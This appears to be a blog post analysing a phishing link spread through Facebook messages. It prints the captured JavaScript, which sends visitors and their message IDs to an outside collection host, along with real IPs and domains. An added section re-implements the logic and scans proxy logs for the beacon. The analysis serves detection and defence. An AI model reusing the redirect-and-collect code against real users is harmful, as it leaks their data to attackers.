I was peacefully watching videos on Hulu when I received a mysterious email from one of my friends on Facebook. The message contained something that this person would probably never say to me, followed by a link. I immediately knew that this might be part of some phishing scam. Knowing that others who had also been sent the message might not realize the danger, I immediately told everyone not to click the link.

Now that the chance of others being taken advantage of by this scam was greatly reduced, I could begin my investigation into what sort of information the phishers were gathering. I fired up a terminal and went to work.

$ curl http://198.64.140.97/funnymovie/

nzmkuewnjpew hvsigccd
<script src="3jsum37jmq1z.js"></script>
uvqztdlft egjykgmuvrrzzmr

Well, that seemed odd. I didn't understand the random characters, but the script tag made it completely obvious that they were up to no good. Well, let's see what it does.

$ curl http://198.64.140.97/funnymovie/3jsum37jmq1z.js

// KROTEG
var abc1 = 'http://r-d-cgpay-090709.com/go/';    // 1
var abc2 = 'http://r-d-cgpay-090709.com/go/';
var ss = '' + location.search; // 2
// both branches pick the same collection URL; abc is never declared with var
if ((location.search).length>0) abc = abc1; else abc = abc2;
// referrer substring -> endpoint that receives the data for that network
var redirects = [
['facebook.com',  abc+'fb.php'],
['tagged.com',    abc+'tg.php'],
['friendster.com',abc+'fr.php'],
['myspace.com',   abc+'ms.php'],
['msplinks.com',  abc+'ms.php'],
['myyearbook.com',abc+'yb.php'],
['fubar.com',     abc+'fu.php'],
['twitter.com',   abc+'tw.php'],
['hi5.com',       abc+'hi5.php'],
['bebo.com',      abc+'be.php']
]; // 3
var s = '' + document.referrer, r = false;
for (var i = 0; i < redirects.length; i ++) {
    if ((s.indexOf(redirects[i][0]) != -1)) { // 4
        // forward the original query string, then append the host as "domain"
        var redir=redirects[i][1] + location.search;
        if ((location.search).length>0) redir=redir+'&domain='+location.host; else redir=redir+'?domain='+location.host;
        location.href = redir;  //5
        r = true;
        break;
    }
}
// no known referrer: still send the visitor (and the query string) to index.php
if (!r) location.href = abc+'index.php'+ location.search;

This find was definitely interesting. Let's go step by step and figure out what they are doing.

First I wanted to know about the site behind all of this, http://r-d-cgpay-090709.com. Its IP address and approximate location could be determined with a simple traceroute.

$ traceroute r-d-cgpay-090709.com

traceroute to r-d-cgpay-090709.com (61.235.117.71), 64 hops max, 40 byte packets
 1  192.168.1.1 (192.168.1.1)  9.331 ms  1.834 ms  2.213 ms
 2  * * *
 3  te-3-4-ur04.santaclara.ca.sfba.comcast.net (68.85.190.253)  11.358 ms  24.434 ms  16.903 ms
 4  be-70-ar01.oakland.ca.sfba.comcast.net (68.85.154.149)  28.483 ms  35.249 ms  16.347 ms
 5  pos-0-6-0-0-cr01.sacramento.ca.ibone.comcast.net (68.86.91.225)  22.579 ms  17.279 ms  14.378 ms
 6  pos-0-9-0-0-cr01.sanjose.ca.ibone.comcast.net (68.86.85.181)  20.288 ms  30.457 ms  27.989 ms
 7  pos-0-0-0-0-pe01.11greatoaks.ca.ibone.comcast.net (68.86.86.54)  23.593 ms  21.716 ms  20.496 ms
 8  tenge13-3.br02.sjo01.pccwbtn.net (63.218.179.25)  23.699 ms  19.488 ms  28.077 ms
 9  china-tietong.pos6-2.cr02.hkg04.pccwbtn.net (63.218.252.10)  414.604 ms  395.548 ms  397.325 ms
10  61.237.119.81 (61.237.119.81)  463.588 ms  414.780 ms  397.284 ms
11  61.237.112.74 (61.237.112.74)  399.872 ms * *
12  222.50.127.218 (222.50.127.218)  434.857 ms  415.261 ms  407.054 ms
13  61.235.116.130 (61.235.116.130)  402.744 ms  424.623 ms  408.174 ms
14  61.235.117.71 (61.235.117.71)  409.368 ms  391.156 ms  397.808 ms

Judging by the hop containing "china-tietong", this IP address appeared to be somewhere in China. I was then curious whether they had a pattern of dubious behavior, so I entered the IP address into Google. According to the search results, McAfee identifies this IP as malicious because it has been responsible for malware in the past. Now that I knew who I was dealing with, it was time to figure out what type of information they were getting from people. I will walk through the lines I have numbered in the code.

  1. This is the URL that they are using to capture the incoming information.
  2. In JavaScript, location.search is the query section of the URL (everything after and including the ?). So in the case of Facebook, it would look something like this: ?t=XXXXXXXXXXXXX&mbox_pos=Y (where X is the message ID).
  3. This part of the code creates a URL of the form http://r-d-cgpay-090709.com/go/fb.php, where the final page differs according to the service the user originates from.
  4. The for loop in this part searches the redirect array for the originating site. Once it has found the site, it creates a URL of the form: http://r-d-cgpay-090709.com/go/fb.php?t=XXXXXXXXXXXXX&mbox_pos=Y&domain=facebook.com
  5. The browser is sent to this URL so that the attackers can gain information about the user who clicked on the link. The site does not send a reply back when visiting this URL.
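As an added example (not the captured script), here is the same redirect logic re-implemented as a side-effect-free function so the destination URL can be computed in Node without a browser, plus a small scan over constructed proxy-log lines for the resulting beacon; note that location.host is the host of the page executing the script, so the domain parameter reports the landing host rather than the referring network.

```javascript
// Added example, not the captured script: a side-effect-free re-implementation
// of its redirect logic, so the URL it would navigate to can be evaluated in
// Node without a browser, plus a small proxy-log scan for the resulting beacons.
const GO = 'http://r-d-cgpay-090709.com/go/';

// Same referrer-to-endpoint table as the captured script.
const REDIRECTS = [
  ['facebook.com', 'fb.php'], ['tagged.com', 'tg.php'],
  ['friendster.com', 'fr.php'], ['myspace.com', 'ms.php'],
  ['msplinks.com', 'ms.php'], ['myyearbook.com', 'yb.php'],
  ['fubar.com', 'fu.php'], ['twitter.com', 'tw.php'],
  ['hi5.com', 'hi5.php'], ['bebo.com', 'be.php'],
];

// referrer, search and host stand in for document.referrer, location.search
// and location.host. Returns the URL the script assigns to location.href.
function buildRedirect(referrer, search, host) {
  const ref = String(referrer);
  for (const [site, page] of REDIRECTS) {
    // indexOf substring match, exactly like the original (first match wins).
    if (ref.indexOf(site) !== -1) {
      const sep = search.length > 0 ? '&' : '?';
      return GO + page + search + sep + 'domain=' + host;
    }
  }
  // Unknown referrer: fall through to index.php, query string passed along.
  return GO + 'index.php' + search;
}

// Pull the leaked fields (message id, position, domain) out of any request to
// the collection endpoint found in a proxy-log line; null if none is present.
function leakedFields(logLine) {
  const m = /https?:\/\/r-d-cgpay-090709\.com\/go\/\S+/.exec(logLine);
  if (!m) return null;
  const u = new URL(m[0]);
  return { page: u.pathname.split('/').pop(), ...Object.fromEntries(u.searchParams) };
}

// Constructed sample log lines (not real traffic): one unrelated hit, one beacon.
const SAMPLE_LOG = [
  '2009-07-10 12:00:01 10.0.0.5 GET http://198.64.140.97/funnymovie/ 200',
  '2009-07-10 12:00:02 10.0.0.5 GET ' +
    buildRedirect('http://www.facebook.com/inbox/', '?t=1234567890123&mbox_pos=2',
                  '198.64.140.97') + ' 200',
];
const hits = SAMPLE_LOG.map(leakedFields).filter(Boolean);
console.log(hits); // [{ page: 'fb.php', t: '1234567890123', mbox_pos: '2', domain: '198.64.140.97' }]
```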

However, the information they are collecting does not seem very interesting. They were able to obtain the message that the URL was posted in, along with the originating site. Maybe it could be a stepping stone for a larger attack? Could they be gathering information about which social network sites are most vulnerable to a phishing attack? Did I simply miss something? Any insightful comments on this potential attack are welcome!